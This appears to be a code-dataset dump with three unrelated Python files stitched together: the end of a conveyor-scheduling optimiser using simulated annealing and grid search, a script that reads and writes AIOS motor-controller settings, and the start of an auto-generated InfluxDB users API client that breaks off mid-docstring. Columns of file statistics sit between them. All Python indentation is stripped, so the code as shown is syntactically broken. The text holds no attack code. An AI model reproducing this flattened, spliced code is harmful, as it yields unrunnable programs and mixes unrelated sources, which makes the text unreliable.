swap(works, conveyor, work_choice, swap_choice)
if count == MAX_ITER:
break
print(n_work, n_process_seq)
print(np.mean(time_collector, axis=1))
performance = best_conveyor_time
_time = time.time() - start_time
return best_works, [performance, _iter, _time, _n_effective, best_iter, best_time, time_collector]
def unidev_search_simulated_anealing(works):
works = np.array([work["time"] for work in works])
works = np.array(works)
n_work, n_process_seq = works.shape
conveyor, conveyor_mask = get_conveyor(works)
_, n_seq = conveyor.shape
process_count = np.sum(conveyor_mask, axis=0)
best_conveyor_time = cal_conveyor_time(conveyor)
before_conveyor_time = best_conveyor_time
T = before_conveyor_time
k = 1.0
c = 0.99
performance = 0
_iter = 0
_time = 0
_n_effective = 0
best_iter = 0
best_time = 0
start_time = time.time()
while True:
_iter += 1
process_sum = np.sum(conveyor, axis=0)
process_mean = process_sum/process_count
process_deviation = np.copy(conveyor)
for i in range(n_seq):
# process_deviation[process_deviation[:, i]>0, i] -= process_mean[i]
process_deviation[conveyor_mask[:, i]>0, i] -= process_mean[i]
process_deviation = np.absolute(process_deviation)
process_deviation_sum = np.sum(process_deviation, axis=0)
process_deviation_mean = nan_to_zero(process_deviation_sum/process_count)
seq_probability = roulette_wheel(process_deviation_mean)
# seq_probability = softmax(process_deviation_mean)
seq_choice = np.random.choice(n_seq, 1, p=seq_probability)[0]
work_index = [i for i, cm in enumerate(conveyor_mask[:, seq_choice]) if cm == 1]
if len(work_index) == 1:
work_choice = work_index[0]
else:
work_probability = roulette_wheel(process_deviation[conveyor_mask[:, seq_choice]>0, seq_choice])
work_choice = np.random.choice(work_index, 1, p=work_probability)[0]
error_collect = []
for i in range(n_work):
error1 = sum(np.absolute(process_mean[i:i+n_process_seq] - works[work_choice]))
error2 = sum(np.absolute(process_mean[work_choice:work_choice+n_process_seq] - works[i]))
error_collect.append(error1+error2)
swap_probability = roulette_wheel(error_collect, True)
swap_choice = np.random.choice(range(n_work), 1, p=swap_probability)[0]
swap(works, conveyor, work_choice, swap_choice)
tmp_conveyor_time = cal_conveyor_time(conveyor)
if best_conveyor_time > tmp_conveyor_time:
_n_effective += 1
best_iter = _iter
best_time = time.time() - start_time
best_conveyor_time = tmp_conveyor_time
best_works = np.copy(works)
delta = tmp_conveyor_time - before_conveyor_time
if delta <= 0:
before_conveyor_time = tmp_conveyor_time
else:
p = np.exp(-(delta/(k*T)))
if p == 0:
break
if np.random.rand() > p:
before_conveyor_time = tmp_conveyor_time
else:
swap(works, conveyor, work_choice, swap_choice)
T = c*T
performance = best_conveyor_time
_time = time.time() - start_time
return best_works, [performance, _iter, _time, _n_effective, best_iter, best_time]
def simulated_anealing(works, mode):
works = np.array([work["time"] for work in works])
"""
mode : 0 // single change, pairwise interchange
mode : 1 // multiple change, pairwise interchange
mode : 2 // single change, adjacent interchange
mode : 3 // multiple change, adjacent interchange
"""
works = np.array(works)
n_work, n_process_seq = works.shape
n_group = n_work//5
conveyor, conveyor_mask = get_conveyor(works)
_, n_seq = conveyor.shape
current_work = np.copy(works)
current_conveyor, _ = get_conveyor(current_work)
current_score = cal_conveyor_time(current_conveyor)
best_works = np.copy(current_work)
best_conveyor_time = current_score
n = 0
performance = 0
_iter = 0
_time = 0
_n_effective = 0
best_iter = 0
best_time = 0
start_time = time.time()
while True:
_iter += 1
candidate_work = np.copy(current_work)
candidate_conveyor = np.copy(current_conveyor)
if mode == 0:
group_select = np.random.randint(n_group)
group_size = len(works[group_select*5:(group_select+1)*5])
member_select1 = np.random.randint(group_size)
member_select2 = np.random.randint(group_size)
swap(candidate_work, candidate_conveyor, group_select*5+member_select1, group_select*5+member_select2)
elif mode == 1:
group_select = np.random.randint(n_group)
group_size = len(works[group_select*5:(group_select+1)*5])
member_select1= np.random.randint(group_size+1)
if member_select1 != group_size:
member_select2 = member_select1-1 if member_select1 != 0 else group_size-1
swap(candidate_work, candidate_conveyor, group_select*5+member_select1, group_select*5+member_select2)
elif mode == 2:
for i in range(n_group):
group_select = i
group_size = len(works[group_select*5:(group_select+1)*5])
member_select1 = np.random.randint(group_size)
member_select2 = np.random.randint(group_size)
swap(candidate_work, candidate_conveyor, group_select*5+member_select1, group_select*5+member_select2)
elif mode == 3:
for i in range(n_group):
group_select = i
group_size = len(works[group_select*5:(group_select+1)*5])
member_select1= np.random.randint(group_size+1)
if member_select1 != group_size:
member_select2 = member_select1-1 if member_select1 != 0 else group_size-1
swap(candidate_work, candidate_conveyor, group_select*5+member_select1, group_select*5+member_select2)
candidate_score = cal_conveyor_time(candidate_conveyor)
# delta = current_score - candidate_score
delta = candidate_score - current_score
T = np.log(2)/np.log(2+delta*n)
u = np.random.random()
if u < np.exp(np.log(2)/T):
if n >= MAX_ITER:
break
else:
current_work = np.copy(candidate_work)
current_conveyor = np.copy(candidate_conveyor)
current_score = candidate_score
if best_conveyor_time > current_score:
_n_effective += 1
best_iter = _iter
best_time = time.time() - start_time
best_works = np.copy(current_work)
best_conveyor_time = current_score
n += 1
performance = best_conveyor_time
_time = time.time() - start_time
return best_works, [performance, _iter, _time, _n_effective, best_iter, best_time]
def grid(works, works_type):
works_type_keys = list(works_type.keys())
works_type_list = [work["type"] for work in works]
works = np.array([work["time"] for work in works])
n_work, n_process_seq = works.shape
conveyor, conveyor_mask = get_conveyor(works)
_, n_seq = conveyor.shape
best_conveyor_time = cal_conveyor_time(conveyor)
best_works = np.copy(works)
index = np.arange(n_work)
performance = 0
_iter = 0
_time = 0
_n_effective = 0
best_iter = 0
best_time = 0
for wtk in works_type_keys:
for i in range(N_PROCESS-1):
work_name = []
time_diff = []
for wtk_ in works_type_keys:
work_name.append(wtk_)
time_diff.append(euclidean(works_type[wtk]["time"][(1+i):], works_type[wtk_]["time"][:-(1+i)]))
argsort_wtd = np.argsort(time_diff)
for aw in argsort_wtd:
works_type[wtk]["sort"][i].append(work_name[aw])
start_time = time.time()
for i in range(MAX_ITER):
_iter += 1
np.random.shuffle(index)
works = works[index]
works_type_list = [works_type_list[i_] for i_ in index]
works_type_count = [0 for wtk in works_type_keys]
for wtl in works_type_list:
works_type_count[works_type_keys.index(wtl)] += 1
for j in range(n_work-1):
works_type_score = [0 for wtk in works_type_keys]
if j == 0:
for wtk in works_type_keys:
for works_type_sort in works_type[wtk]["sort"]:
for k, wts in enumerate(works_type_sort):
works_type_score[works_type_keys.index(wts)] += k
else:
for k in range(j if N_PROCESS-1>j else N_PROCESS-1):
for l, wts in enumerate(works_type[works_type_list[j-k-1]]["sort"][k]):
works_type_score[works_type_keys.index(wts)] += len(works_type_keys)-(l+1)
if j == 0:
am = np.argmax(np.array(works_type_count)*np.array(works_type_score))
else:
am = np.argmax(np.array(works_type_count)*np.array(works_type_score))
for k in range(j, n_work):
if works_type_list[k] == works_type_keys[am]:
break
works[j], works[k] = works[k], works[j]
works_type_list[j], works_type_list[k] = works_type_list[k], works_type_list[j]
works_type_count[works_type_keys.index(works_type_list[j])] -= 1
conveyor, _ = get_conveyor(works)
tmp_conveyor_time = cal_conveyor_time(conveyor)
if best_conveyor_time > tmp_conveyor_time:
_n_effective += 1
best_iter = _iter
best_time = time.time() - start_time
best_conveyor_time = tmp_conveyor_time
best_works = np.copy(works)
performance = best_conveyor_time
_time = time.time() - start_time
return best_works, [performance, _iter, _time, _n_effective, best_iter, best_time]
| 30.247405
| 107
| 0.730824
| 2,676
| 17,483
| 4.43423
| 0.045964
| 0.093039
| 0.063374
| 0.028822
| 0.889938
| 0.872661
| 0.857071
| 0.830861
| 0.802966
| 0.796056
| 0
| 0.015426
| 0.158325
| 17,483
| 577
| 108
| 30.299827
| 0.790962
| 0.065835
| 0
| 0.817352
| 0
| 0
| 0.003482
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018265
| false
| 0.004566
| 0
| 0
| 0.03653
| 0.004566
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dee1dc70ba226b86a2b0d2fcbd05afab1477ed0
| 5,214
|
py
|
Python
|
restore_config.py
|
FourierDynamics/FourierDynamics-aios_python_example
|
dc0b69d72fe6896ceab816f2b9508a1d9c6b25f1
|
[
"MIT"
] | 2
|
2021-01-09T13:21:00.000Z
|
2021-05-05T01:30:10.000Z
|
restore_config.py
|
FourierDynamics/FourierDynamics-aios_python_example
|
dc0b69d72fe6896ceab816f2b9508a1d9c6b25f1
|
[
"MIT"
] | null | null | null |
restore_config.py
|
FourierDynamics/FourierDynamics-aios_python_example
|
dc0b69d72fe6896ceab816f2b9508a1d9c6b25f1
|
[
"MIT"
] | 2
|
2021-03-19T08:21:06.000Z
|
2021-06-11T06:01:14.000Z
|
import aios
import time
import threading
import numpy as np
Server_IP_list = ['192.168.5.81']
def main():
Server_IP_list = aios.broadcast_func()
if Server_IP_list:
# for i in range(len(Server_IP_list)):
# aios.passthrough(Server_IP_list[i], "w config.dc_bus_undervoltage_trip_level 10.0\n")
# aios.passthrough(Server_IP_list[i], "w config.dc_bus_overvoltage_trip_level 50.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.motor.config.pre_calibrated 1\n")
# aios.passthrough(Server_IP_list[i], "w axis1.motor.config.pole_pairs 7\n")
# aios.passthrough(Server_IP_list[i], "w axis1.motor.config.calibration_current 5.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.motor.config.resistance_calib_max_voltage 3.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.motor.config.phase_inductance 0.00010607676085783169\n")
# aios.passthrough(Server_IP_list[i], "w axis1.motor.config.phase_resistance 0.2877658009529114\n")
# aios.passthrough(Server_IP_list[i], "w axis1.motor.config.current_lim 15.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.motor.config.current_lim_margin 4.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.motor.config.requested_current_range 30.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.motor.config.current_control_bandwidth 500.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.controller.config.pos_gain 15.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.controller.config.vel_gain 0.00019999999494757503\n")
# aios.passthrough(Server_IP_list[i], "w axis1.controller.config.vel_integrator_gain 0.00019999999494757503\n")
# aios.passthrough(Server_IP_list[i], "w axis1.controller.config.vel_limit 400000.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.controller.config.vel_limit_tolerance 1.2000000476837158\n")
# aios.passthrough(Server_IP_list[i], "w axis1.controller.config.vel_ramp_enable 0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.controller.config.vel_ramp_rate 200000.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.encoder.config.cpr 4000\n")
# aios.passthrough(Server_IP_list[i], "w axis1.trap_traj.config.vel_limit 200000.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.trap_traj.config.accel_limit 320000.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.trap_traj.config.decel_limit 320000.0\n")
# aios.passthrough(Server_IP_list[i], "w axis1.trap_traj.config.A_per_css 0.0\n")
# print('\n')
for i in range(len(Server_IP_list)):
aios.passthrough(Server_IP_list[i], "r config.dc_bus_undervoltage_trip_level\n")
aios.passthrough(Server_IP_list[i], "r config.dc_bus_overvoltage_trip_level\n")
aios.passthrough(Server_IP_list[i], "r axis1.motor.config.pre_calibrated\n")
aios.passthrough(Server_IP_list[i], "r axis1.motor.config.pole_pairs\n")
aios.passthrough(Server_IP_list[i], "r axis1.motor.config.calibration_current\n")
aios.passthrough(Server_IP_list[i], "r axis1.motor.config.resistance_calib_max_voltage\n")
aios.passthrough(Server_IP_list[i], "r axis1.motor.config.phase_inductance\n")
aios.passthrough(Server_IP_list[i], "r axis1.motor.config.phase_resistance\n")
aios.passthrough(Server_IP_list[i], "r axis1.motor.config.current_lim\n")
aios.passthrough(Server_IP_list[i], "r axis1.motor.config.current_lim_margin\n")
aios.passthrough(Server_IP_list[i], "r axis1.motor.config.requested_current_range\n")
aios.passthrough(Server_IP_list[i], "r axis1.motor.config.current_control_bandwidth\n")
aios.passthrough(Server_IP_list[i], "r axis1.controller.config.control_mode\n")
aios.passthrough(Server_IP_list[i], "r axis1.controller.config.pos_gain\n")
aios.passthrough(Server_IP_list[i], "r axis1.controller.config.vel_gain\n")
aios.passthrough(Server_IP_list[i], "r axis1.controller.config.vel_integrator_gain\n")
aios.passthrough(Server_IP_list[i], "r axis1.controller.config.vel_limit\n")
aios.passthrough(Server_IP_list[i], "r axis1.controller.config.vel_limit_tolerance\n")
aios.passthrough(Server_IP_list[i], "r axis1.controller.config.vel_limit\n")
aios.passthrough(Server_IP_list[i], "r axis1.controller.config.vel_ramp_enable\n")
aios.passthrough(Server_IP_list[i], "r axis1.controller.config.vel_ramp_rate\n")
aios.passthrough(Server_IP_list[i], "r axis1.encoder.config.cpr\n")
aios.passthrough(Server_IP_list[i], "r axis1.trap_traj.config.vel_limit\n")
aios.passthrough(Server_IP_list[i], "r axis1.trap_traj.config.accel_limit\n")
aios.passthrough(Server_IP_list[i], "r axis1.trap_traj.config.decel_limit\n")
aios.passthrough(Server_IP_list[i], "r axis1.trap_traj.config.A_per_css\n")
print('\n')
if __name__ == '__main__':
main()
| 59.25
| 123
| 0.695627
| 777
| 5,214
| 4.401544
| 0.120978
| 0.128655
| 0.192982
| 0.336257
| 0.920175
| 0.882164
| 0.813158
| 0.794444
| 0.794444
| 0.783626
| 0
| 0.0513
| 0.173763
| 5,214
| 87
| 124
| 59.931034
| 0.742572
| 0.434983
| 0
| 0.052632
| 0
| 0
| 0.36074
| 0.335389
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026316
| false
| 0.684211
| 0.105263
| 0
| 0.131579
| 0.026316
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
814f95db6ab9d745cda146f141e688e5dcb1d7d0
| 41,096
|
py
|
Python
|
influxdb_client/service/users_service.py
|
mmatl/influxdb-client-python
|
7461297c153ef1401c861992a8886bee1ec4ce4d
|
[
"MIT"
] | null | null | null |
influxdb_client/service/users_service.py
|
mmatl/influxdb-client-python
|
7461297c153ef1401c861992a8886bee1ec4ce4d
|
[
"MIT"
] | null | null | null |
influxdb_client/service/users_service.py
|
mmatl/influxdb-client-python
|
7461297c153ef1401c861992a8886bee1ec4ce4d
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
InfluxDB OSS API Service.
The InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
class UsersService(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None): # noqa: E501,D401,D403
"""UsersService - a operation defined in OpenAPI."""
if api_client is None:
raise ValueError("Invalid value for `api_client`, must be defined.")
self.api_client = api_client
def delete_users_id(self, user_id, **kwargs): # noqa: E501,D401,D403
"""Delete a user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_users_id(user_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: The ID of the user to delete. (required)
:param str zap_trace_span: OpenTracing span context
:return: None
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_users_id_with_http_info(user_id, **kwargs) # noqa: E501
else:
(data) = self.delete_users_id_with_http_info(user_id, **kwargs) # noqa: E501
return data
def delete_users_id_with_http_info(self, user_id, **kwargs): # noqa: E501,D401,D403
"""Delete a user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_users_id_with_http_info(user_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: The ID of the user to delete. (required)
:param str zap_trace_span: OpenTracing span context
:return: None
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
local_var_params = locals()
all_params = ['user_id', 'zap_trace_span'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
all_params.append('urlopen_kw')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_users_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in local_var_params or
local_var_params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `delete_users_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_id' in local_var_params:
path_params['userID'] = local_var_params['user_id'] # noqa: E501
query_params = []
header_params = {}
if 'zap_trace_span' in local_var_params:
header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
# urlopen optional setting
urlopen_kw = None
if 'urlopen_kw' in kwargs:
urlopen_kw = kwargs['urlopen_kw']
return self.api_client.call_api(
'/api/v2/users/{userID}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
urlopen_kw=urlopen_kw)
def get_flags(self, **kwargs): # noqa: E501,D401,D403
"""Return the feature flags for the currently authenticated user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_flags(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str zap_trace_span: OpenTracing span context
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_flags_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_flags_with_http_info(**kwargs) # noqa: E501
return data
def get_flags_with_http_info(self, **kwargs): # noqa: E501,D401,D403
"""Return the feature flags for the currently authenticated user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_flags_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str zap_trace_span: OpenTracing span context
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
local_var_params = locals()
all_params = ['zap_trace_span'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
all_params.append('urlopen_kw')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_flags" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'zap_trace_span' in local_var_params:
header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
# urlopen optional setting
urlopen_kw = None
if 'urlopen_kw' in kwargs:
urlopen_kw = kwargs['urlopen_kw']
return self.api_client.call_api(
'/api/v2/flags', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
urlopen_kw=urlopen_kw)
def get_me(self, **kwargs): # noqa: E501,D401,D403
"""Retrieve the currently authenticated user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_me(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str zap_trace_span: OpenTracing span context
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_me_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_me_with_http_info(**kwargs) # noqa: E501
return data
def get_me_with_http_info(self, **kwargs): # noqa: E501,D401,D403
"""Retrieve the currently authenticated user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_me_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str zap_trace_span: OpenTracing span context
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
local_var_params = locals()
all_params = ['zap_trace_span'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
all_params.append('urlopen_kw')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_me" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'zap_trace_span' in local_var_params:
header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
# urlopen optional setting
urlopen_kw = None
if 'urlopen_kw' in kwargs:
urlopen_kw = kwargs['urlopen_kw']
return self.api_client.call_api(
'/api/v2/me', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
urlopen_kw=urlopen_kw)
def get_users(self, **kwargs): # noqa: E501,D401,D403
"""List all users.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_users(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str zap_trace_span: OpenTracing span context
:param int offset:
:param int limit:
:param str after: Resource ID to seek from. Results are not inclusive of this ID. Use `after` instead of `offset`.
:param str name:
:param str id:
:return: Users
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_users_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_users_with_http_info(**kwargs) # noqa: E501
return data
def get_users_with_http_info(self, **kwargs): # noqa: E501,D401,D403
"""List all users.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_users_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str zap_trace_span: OpenTracing span context
:param int offset:
:param int limit:
:param str after: Resource ID to seek from. Results are not inclusive of this ID. Use `after` instead of `offset`.
:param str name:
:param str id:
:return: Users
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
local_var_params = locals()
all_params = ['zap_trace_span', 'offset', 'limit', 'after', 'name', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
all_params.append('urlopen_kw')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_users" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if 'offset' in local_var_params and local_var_params['offset'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `offset` when calling `get_users`, must be a value greater than or equal to `0`") # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] > 100: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_users`, must be a value less than or equal to `100`") # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_users`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'after' in local_var_params:
query_params.append(('after', local_var_params['after'])) # noqa: E501
if 'name' in local_var_params:
query_params.append(('name', local_var_params['name'])) # noqa: E501
if 'id' in local_var_params:
query_params.append(('id', local_var_params['id'])) # noqa: E501
header_params = {}
if 'zap_trace_span' in local_var_params:
header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
# urlopen optional setting
urlopen_kw = None
if 'urlopen_kw' in kwargs:
urlopen_kw = kwargs['urlopen_kw']
return self.api_client.call_api(
'/api/v2/users', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Users', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
urlopen_kw=urlopen_kw)
def get_users_id(self, user_id, **kwargs): # noqa: E501,D401,D403
"""Retrieve a user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_users_id(user_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: The user ID. (required)
:param str zap_trace_span: OpenTracing span context
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_users_id_with_http_info(user_id, **kwargs) # noqa: E501
else:
(data) = self.get_users_id_with_http_info(user_id, **kwargs) # noqa: E501
return data
def get_users_id_with_http_info(self, user_id, **kwargs): # noqa: E501,D401,D403
"""Retrieve a user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_users_id_with_http_info(user_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: The user ID. (required)
:param str zap_trace_span: OpenTracing span context
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
local_var_params = locals()
all_params = ['user_id', 'zap_trace_span'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
all_params.append('urlopen_kw')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_users_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in local_var_params or
local_var_params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_users_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_id' in local_var_params:
path_params['userID'] = local_var_params['user_id'] # noqa: E501
query_params = []
header_params = {}
if 'zap_trace_span' in local_var_params:
header_params['Zap-Trace-Span'] = local_var_params['zap_trace_span'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
# urlopen optional setting
urlopen_kw = None
if 'urlopen_kw' in kwargs:
urlopen_kw = kwargs['urlopen_kw']
return self.api_client.call_api(
'/api/v2/users/{userID}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
urlopen_kw=urlopen_kw)
def patch_users_id(self, user_id, user, **kwargs): # noqa: E501,D401,D403
"""Update a user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_users_id(user_id, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: The ID of the user to update. (required)
:param User user: User update to apply (required)
:param str zap_trace_span: OpenTracing span context
:return: UserResponse
If the method is called asynchronously,
returns the request thread.
""" # noqa: E501
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_users_id_with_http_info(user_id, user, **kwargs) # noqa: E501
else:
(data) = self.patch_users_id_with_http_info(user_id, user, **kwargs) # noqa: E501
return data
def patch_users_id_with_http_info(self, user_id, user, **kwargs): # noqa: E501,D401,D403
"""Update a user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_users_id_with_http_info(user_id, user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: The ID of the user to update. (required)
